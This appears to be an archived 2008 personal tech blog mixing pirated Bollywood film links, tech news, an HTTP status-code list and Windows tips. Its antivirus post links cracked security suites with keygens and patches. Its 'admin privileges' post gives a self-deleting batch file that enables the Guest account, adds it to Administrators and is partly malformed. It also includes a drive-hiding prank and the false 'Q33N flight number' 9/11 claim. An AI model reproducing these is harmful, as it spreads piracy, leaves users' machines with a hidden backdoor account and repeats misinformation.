Thursday, November 27, 2008
New JODHAA AKBAR LINKS......
http://www.megaupload.com/?d=TMHQW1DJ
http://www.megaupload.com/?d=QMGNS966
http://www.megaupload.com/?d=U1HUPP3E
http://www.megaupload.com/?d=L6FPYF4F
http://www.megaupload.com/?d=TLVC4IU7
http://www.megaupload.com/?d=IA7BZHJO
http://www.megaupload.com/?d=9ALWIFA9
http://www.megaupload.com/?d=I3VQCQM4
http://www.megaupload.com/?d=LUHWCLIK
http://www.megaupload.com/?d=VBL03U0J
http://www.megaupload.com/?d=K41GX6IB
http://www.megaupload.com/?d=68GVH99E
http://www.megaupload.com/?d=IB94MN1I
http://www.megaupload.com/?d=XIHQS1KX
http://www.megaupload.com/?d=14YORP23
Saturday, October 11, 2008
Team viewer download link
This is the download link of team viewer desktop sharing software.
click here to download
Saturday, October 4, 2008
Sunday, August 3, 2008
Sunday, July 20, 2008
Watch Jaane Tu Ya Jaane Na online
Jaane Tu Ya Jaane Na (2008) - Imran Khan, Genelia D'Souza, Manjari Fadnis
Description: Jaane Tu Ya Jaane Na is the first directorial venture of Munna Bhai fame Abbas Tyrewala. Written by Tyrewala, Jaane Tu Ya Jaane Na is a romantic film based on the love story of Jai Singh Rathore (Imran Khan) and Aditi Mahant (Genelia D’Souza). The film plot revolves around Jai - the most non-violent Rajput either side of the Aravallis and Aditi - a violent and passionate girl.The movie is divided into Parts for the users comfort....so enjoy it in parts wise
Part 1
Part 2
Part 3
Part 4
Part 5
Part 6
Part 7
Part 8
enjoy da movie.....feedback @ shoutbox in da blogggggg
Tuesday, July 15, 2008
Google's Android developers thinking about abandoning Android?
Over at Google's official Android discussion group, independent coder Nicolas Gramlich recently posted an ad hoc online petition calling on Google to at least tell developers why they can't get a new and improved SDK for the fledgling mobile platform. Google hasn't publicly updated the Android software developer's kit in more than five months.
"In order not to lose many highly encouraged developers, I think it's time to release some news about the development process of the SDK. Maybe let us know why we have to live with these long cycles," reads his open letter to Google's Android overseers. "In my personal opinion it is not the right choice to keep developers in the dark. We, the developers, are the absolute base of success to the whole Android platform."
Read More: http://www.theregister.co.uk/2008/07...eloper_unrest/
Sunday, July 13, 2008
MyColors 2.5 Released
Just wanted to gives a heads up that MyColors 2.5 was released today, and it includes a new free theme called "Think Green".
MyColors changes your Windows visual style, icons, wallpaper, and even adds gadgets to your desktop. These gadgets can range from media players to weather forecast gadgets depending on the theme. It doesn't modify any system files and enables users to easily switch between themes and back to default Windows with just a few clicks. MyColors 2.5 now comes with the ability to have themes with sub-styles. This will allow you choose variations of a specific theme to let your further customize your desktop experience . A new "Wallpapers" tab has been introduced that allows users to choose and switch between different wallpapers in the selected theme. The biggest announcement with MyColors 2.5, however, is the fact that it is now compatible with Windows Vista 64 bit. |
Tuesday, May 20, 2008
Login to zoho with your gmail or yahoo id
Online office suite provider zoho now allows you to access their service with you existing gmail or yahoo account without creating a separate zoho account. You just have to sign with your gmail/yahoo account and enter your desired username to use the service. So now with gmail account , you can not only access google docs but zoho office suite as well.
Read more at official zoho blog: http://blogs.zoho.com/?s=login+with+gmail&sbutt=Go
Saturday, March 22, 2008
Google Phone Named as 'Dream' by HTC [PCWorldIndia]
Thursday, March 6, 2008
Sunday, March 2, 2008
Internet ERROR CODES
The codes can generally by grouped as follows -
100-199 - Information Codes. Provide information about the request or the servers involved.
200-299 - Success Codes. Indicate that the request was accepted or the requested file has no content (empty).
300-399 - Redirects. Requested content has moved.
400-499 - Client Errors. Cannot find content or you don't have the correct permissions to access it.
500-599 - Server Errors. There is a problem at the server end stopping the request from completing successfully.
To give you a greater understanding of these errors, here is a list of the most popular codes.
As a rule of thumb, the first thing you should if you get an error is make sure that you have typed in the URL or page address correctly.
Bad request 400
The request could not be understood by the server due to bad syntax. You should not repeat the request without modifications.
Unauthorized 401
The creators of a Web page may want only certain people have access to that page. You should only retry the request if you know that you have authorization.
PaymentRequired 402
This message gives a specification of charging schemes which are acceptable. You may retry the request with a suitable ChargeTo header.
Forbidden 403
The request is for something forbidden. Authorization will not help. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable. (The file needs to be set with "read permissions" for all users.)
Not found 404
The server has not found anything matching what you requested. Make sure that the Web address (URL) that you typed in exactly matches the address you were given. Check that the capitalization matches, spelling, and punctuation, like dots (.) and slashes (/), are correctly placed. Be sure you are using the forward slash (/) and not the backward slash (\).
405 Method Not Allowed
The method specified in the Request-Line is not allowed for the resource identified by the request. The response must include an Allow header containing a list of valid methods for the requested resource.
406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.
407 Proxy Authentication Required
This code is similar to 401 (Unauthorized) , but indicates that you must first authenticate yourself with the proxy. The proxy must return a Proxy-Authenticate header field (section 14.33) containing a challenge applicable to the proxy for the requested resource. You may repeat the request with a suitable Proxy-Authorization header field (section 14.34). HTTP access authentication is explained in section 11.
408 Request Timeout
The client did not produce a request within the time that the server was prepared to wait. You may repeat the request without modifications at any later time.
409 Conflict
The request could not be completed due to a conflict with the current state of the resource. This code is only allowed in situations where it is expected that the user might be able to resolve the conflict and resubmit the request.
410 Gone
The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners want remote links to that resource be removed.
411 Length Required
The server refuses to accept the request without a defined Content- Length. The client may repeat the request if it adds a valid Content-Length header field containing the length of the message-body in the request message.
412 Precondition Failed
The precondition given in one or more of the request-header fields evaluated to false when it was tested on the server. This response code allows the client to place preconditions on the current resource metainformation (header field data) and thus prevent the requested method from being applied to a resource other than the one intended.
413 Request Entity Too Large
The server is refusing to process a request because the request entity is larger than the server is willing or able to process. The server may close the connection to prevent the client from continuing the request.
414 Request-URI Too Long
The server is refusing to service the request because the Request-URI is longer than the server is willing to interpret.
415 Unsupported Media Type
The server is refusing to service the request because the entity of the request is in a format not supported by the requested resource for the requested method.
Internal Error 500
The server encountered an unexpected condition which prevented it from fulfilling the request. Your request could not be processed due to an internal server error.
Not implemented 501 The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource.
502 Bad Gateway
The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.
503 Service Unavailable
The server is currently unable to handle the request due to a temporary overloading or maintenance of the server. The implication is that this is a temporary condition which will be alleviated after some delay. If known, the length of the delay may be indicated in a Retry-After header. If no Retry-After is given, you should handle the response as it would for a 500 response.
504 Gateway Timeout
The server, while acting as a gateway or proxy, did not receive a timely response from the upstream server it accessed in attempting to complete the request.
505 HTTP Version Not Supported
The server does not support, or refuses to support, the HTTP protocol version that was used in the request message. The response should contain an entity describing why that version is not supported and what other protocols are supported by that server.
Saturday, February 23, 2008
All useful ANTIVIRUS Links ........
These are some of the best of my choice...
1) Kaspersky 7.0 Antivirus FuLL + up to 2010 Keys
http://rapidshare.com/files/57163426/Kaspersky_Anti-Virus_7.0.7.0.123_www.4evershare.com_upLoad.rar
2) Kaspersky Internet Security 2007 7.0.0.220 + License
Homepage - http://www.kaspersky.com Size: 27.3 MB
http://rapidshare.com/files/57056078/Kaspersky.Internet.Security.7.0.0.220.Full.rar
3) Norton Internet Security 2008!!! v10.2 / 63.1mb
NIS2008+Keygen:
http://rapidshare.com/files/53504911/Norton_Internet_Security_2008_10.2_iLLeGaLiZ.Biz.rar
4) Spyware Doctor 5.0.5.259
http://rapidshare.com/files/50476215/spwdct505259.rar
5) McAfee Total Protection 2007
http://rapidshare.com/files/47384634/SirDavid.Totally.2007.Retail-M_W.rar
6) Ashampoo AntiVirus v1.40
http://rapidshare.com/files/50112735/Ashampoo_AntiVirus_v1.40_iLLeGaLiZ.Biz.rar
7) Nod 32 v2.70.39
Download:
http://filehippo.com/download_nod32/
Patch:
http://www.megashare.com/258355
run the patch after restart.
DISPLAYING UR NAMES ON TASKBAR BESIDE TIME....
Hi friends i want to share a funny trick with time display in the taskbar....Let us see.....
Trick to show ur nake after time in taskbar....
Here is a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of friends...
Its simple....
Start -> Control Panel -> Regional and Language option -> Customize (beside English US) -> Go to TIME tab -> change AM or PM symbols from AM or PM to ur name or the word u like to display-> Apply -> OK
Is it changed?? Might be not...Now go to time in taskbar and double click it to open "Date and time property"...Look place where time changes in digital from to ur desired word....
Click to arrow to change the AM or PM by selecting and press arrow..
It will show ur name or word that was entered by u, Apply -> OK...
Monday, February 18, 2008
Osmotic Pressure
Why can osmotic forces be thought of as pressures? Do you know any way to
measure these forces as pressures?
The total force acting on water at any point along the vessel, called the
filtration pressure will be the sum of the two forces; this is called the STARLING
HYPOTHESIS. For water in the formation of lymph it can be written as:
Filtration pressure = Phydrostatic + Î osm
To find the filtration rate, we need to also consider a permeability
(conductance -- review early material from lab) factor determined largely by the density of
capillary pores -- the more pores, the more water can move for a given filtration pressure:
Filtration rate = k * (Phydrostatic + Î osm)
where k is the conductance for water.
Let's look at this equation in detail. IF EVERYTHING ELSE REMAINS
CONSTANT:
if the capillary hydrostatic pressure (Pcap) increases or the tissue
hydrostatic pressure decreases, there will be a greater pressure tending to drive materials
across the membrane and the filtration rate will increase.
By contrast, a relatively higher intercellular fluid osmotic pressure
(Î icf) will tend to encourage fluid to leave the capillary as will a relative lower tubule osmotic pressure.
If you would like to know more,check it out on Wiki.
Sunday, February 10, 2008
Want admin privilegas on ur pc????
copy and paste the code given below in notepad and save it as anyname.bat
den dbclick on it...this will add u in administrator group
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Wednesday, January 30, 2008
Multiple Yahoo messenger Using Registryyyyyyy
Multiple Yahoo messenger Using Registryyyyyyy
1. Go to Start ----> Run . Type regedit, then enter.
2. Navigate to HKEY_CURRENT_ USER -------->
Software --->yahoo ----->pager---->Test
3. On the right page , right-click and choose new Dword value .
4. Rename it as Plural.
5. Double click and assign a decimal value of 2 or what ever you want(up to 9)
Its done!!
Now open yahoo messenger and login with any yahoo id. Then again click on yahoo messenger icon. You will see that another yahoo messenger opens in which you can login.
Before this tweak, you will open yahoo messenger and login with any yahoo id and again when you click on yahoo messenger icon to login with other yahoo id then other new messenger will not be opened, the same will again pop-up which you've opened before.
Tuesday, January 29, 2008
Hide ur drives.
Hide ur drives
How to Hide the drives(c:,d:,e:,a:...etc)
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....
Monday, January 28, 2008
Different ways to shutdown ur PC
Different ways to shutdown ur pc
There are so many different ways to turn off your Windows XP computer, let's look at some of them:
1. The standard approach - click the Start Button with your mouse, then select the Turn Off menu and finally click the Turn Off icon on the Turn Off computer dialog. blink.gif
2. Press Ctrl+Esc key or the Win key and press u two times - the fastest approach.
3. Get the Shutdown utility from Download.com - it add the shut down shortcuts for you. Else create them yourself using approach 4.
4. Create a shutdown shortcut on your desktop. Right click on the desktop, choose New Shortcut and type shutdown -s -t 00 in the area where you are asked to specify the location of the program file. Now you can just double click this icon to turn off the computer. The best location would be your quick launch bar.
5. Press the Win key + R key to open the run window. Type shutdown -s -t 00. [s means shutdown while t means the duration after which you want to initiate the shutdown process].
If some open processes or application won't let you turn off, append a -f switch to force a shut down by closing all active processes.
6. Win+M to minimize all windows and then Alt+F4 to bring the Turn Off computer dialog.
7. Open Windows Task manager (by right clicking the Windows Task bar or Alt+Ctrl+Del) and choose Shut down from the menu. Useful when the Windows are not responding.
8. open task manager--->click on shutdown--->hold the ctrl key and click on Turn off::::::: pc will be turned off in 3 secs.. fastest method other than hard shutdown
Sunday, January 27, 2008
--------------NOTEPAD "world trade centre trick"..---------------
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
--------------NOTEPAD "world trade centre trick"..---------------
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.